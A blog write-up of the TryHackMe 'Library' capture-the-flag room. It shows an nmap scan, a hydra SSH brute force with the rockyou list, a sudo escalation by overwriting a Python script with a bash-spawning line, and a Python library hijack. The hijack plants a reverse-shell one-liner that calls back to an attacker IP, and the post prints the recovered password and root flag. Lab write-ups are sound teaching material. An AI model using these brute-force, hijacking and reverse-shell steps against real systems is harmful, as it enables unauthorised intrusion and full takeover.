This page looks best with JavaScript enabled

TryHackMe Writeup - Library Room

 ·  ☕ 4 min read  ·  👨‍💻 g4nd1v
Title https://tryhackme.com/room/bsidesgtlibrary
Description boot2root machine for FIT and bsides guatemala CTF
Difficulty Easy
Maker https://tryhackme.com/p/stuxnet

Nmap

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

└─$ nmap -sC -sV -oA nmap/library 10.10.157.19
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-27 11:55 EST
Nmap scan report for 10.10.157.19
Host is up (0.10s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:2f:c3:47:67:06:32:04:ef:92:91:8e:05:87:d5:dc (RSA)
|   256 68:92:13:ec:94:79:dc:bb:77:02:da:99:bf:b6:9d:b0 (ECDSA)
|_  256 43:e8:24:fc:d8:b8:d3:aa:c2:48:08:97:51:dc:5b:7d (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Welcome to  Blog - Library Machine
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.15 seconds

So, there are 2 ports that are open. ssh and http. It doesnot seem to contain CVE in apache version for remote code execution.

Next, I tried to get directories using gobuster and tried to find subdomain using ffuf , but nothing showed interesting results.

user flag

There are 2 things that is giving some hints. Firstly, in comments of the blog, it seems to have the usernames i.e. root , www-data , meliodas , and Anonymous. Moreover, in robots.txt there is a word rockyou. So maybe I thought bruteforce SSH using hydra?

Voila, we got the password for SSH.

1
2
3
4

└─$ hydra -L names.txt -P /usr/share/wordlists/rockyou.txt 10.10.157.19 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
...
[22][ssh] host: 10.10.157.19   login: meliodas   password: iloveyou1

root flag

Upon doing sudo -l we found there is a file which we can use as sudo.

1
2
3
4
5
6

meliodas@ubuntu:~$ sudo -l
Matching Defaults entries for meliodas on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User meliodas may run the following commands on ubuntu:
    (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py

This is the content of the file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

meliodas@ubuntu:~$ cat bak.py
#!/usr/bin/env python
import os
import zipfile

def zipdir(path, ziph):
    for root, dirs, files in os.walk(path):
        for file in files:
            ziph.write(os.path.join(root, file))

if __name__ == '__main__':
    zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED)
    zipdir('/var/www/html', zipf)
    zipf.close()

Here is the file structure.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

meliodas@ubuntu:~$ ls -al
total 40
drwxr-xr-x 4 meliodas meliodas 4096 Aug 24  2019 .
drwxr-xr-x 3 root     root     4096 Aug 23  2019 ..
-rw-r--r-- 1 root     root      353 Aug 23  2019 bak.py
-rw------- 1 root     root       44 Aug 23  2019 .bash_history
-rw-r--r-- 1 meliodas meliodas  220 Aug 23  2019 .bash_logout
-rw-r--r-- 1 meliodas meliodas 3771 Aug 23  2019 .bashrc
drwx------ 2 meliodas meliodas 4096 Aug 23  2019 .cache
drwxrwxr-x 2 meliodas meliodas 4096 Aug 23  2019 .nano
-rw-r--r-- 1 meliodas meliodas  655 Aug 23  2019 .profile
-rw-r--r-- 1 meliodas meliodas    0 Aug 23  2019 .sudo_as_admin_successful
-rw-rw-r-- 1 meliodas meliodas   33 Aug 23  2019 user.txt

Simple Solution is to remove the bak.py file and create new file and write shell there to and run it as sudo to get the root.

1
2
3
4
5
6

meliodas@ubuntu:~$ mv bak.py  bak.py.bk
meliodas@ubuntu:~$ vi bak.py
meliodas@ubuntu:~$ echo 'import pty; pty.spawn("/bin/bash")' > bak.py
meliodas@ubuntu:~$ sudo python /home/meliodas/bak.py
root@ubuntu:~# cat /root/root.txt
e8c8c6c256c35515d1d344ee0488c617

root flag - Method #2

echo $PATH - it is using meliodas directory in the path, so we can create our rev shell in place of the library which is using in the program like zipfile.

More detailed explanation for Python-Library-Hijacking - https://www.hackingarticles.in/linux-privilege-escalation-python-library-hijacking/

1
2

meliodas@ubuntu:~$ echo $PATH
/home/meliodas/bin:/home/meliodas/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games

On server

1
2
3
4
5
6
7

meliodas@ubuntu:~$ vi zipfile.py
meliodas@ubuntu:~$ cat zipfile.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.95.227",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
meliodas@ubuntu:~$ ls
bak.py  user.txt  zipfile.py  zipfile.pyc
meliodas@ubuntu:~$ sudo python3 /home/meliodas/bak.py
<active shell connection>

On Client

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.8.95.227] from (UNKNOWN) [10.10.157.19] 50962
# whoami
root
# ls
bak.py
__pycache__
user.txt
zipfile.py
zipfile.pyc
# cat /root/root.txt
e8c8c6c256c35515d1d344ee0488c617
Share on
g4nd1v
WRITTEN BY
g4nd1v
Pentester (BSCP | eJPTv2)

See Also

©2025, All Rights Reserved